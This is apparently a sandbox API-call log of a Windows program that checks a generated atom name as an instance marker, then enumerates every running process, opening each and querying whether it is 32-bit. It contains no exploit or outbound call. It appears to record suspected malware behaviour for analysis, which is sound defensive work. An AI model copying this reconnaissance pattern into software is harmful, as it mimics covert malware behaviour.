	[0072.296] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.296] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.296] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.296] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.297] GetLastError () returned 0x5
	[0072.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.298] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.298] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.298] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.298] CloseHandle (hObject=0x224) returned 1
	[0072.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.298] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.298] CloseHandle (hObject=0x224) returned 1
	[0072.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e888, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.299] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.299] CloseHandle (hObject=0x224) returned 1
	[0072.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.331] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.336] CloseHandle (hObject=0x224) returned 1
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.336] CloseHandle (hObject=0x224) returned 1
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.337] CloseHandle (hObject=0x224) returned 1
	[0072.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.337] CloseHandle (hObject=0x224) returned 1
	[0072.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.337] CloseHandle (hObject=0x224) returned 1
	[0072.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.337] CloseHandle (hObject=0x224) returned 1
	[0072.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.338] CloseHandle (hObject=0x224) returned 1
	[0072.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.338] CloseHandle (hObject=0x224) returned 1
	[0072.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.338] CloseHandle (hObject=0x224) returned 1
	[0072.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.338] CloseHandle (hObject=0x224) returned 1
	[0072.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.339] CloseHandle (hObject=0x224) returned 1
	[0072.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728878, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.339] CloseHandle (hObject=0x224) returned 1
	[0072.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.339] CloseHandle (hObject=0x224) returned 1
	[0072.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.340] CloseHandle (hObject=0x224) returned 1
	[0072.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.340] CloseHandle (hObject=0x224) returned 1
	[0072.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e860, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.340] CloseHandle (hObject=0x224) returned 1
	[0072.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.340] CloseHandle (hObject=0x224) returned 1
	[0072.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.341] CloseHandle (hObject=0x224) returned 1
	[0072.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.341] CloseHandle (hObject=0x224) returned 1
	[0072.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728998, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
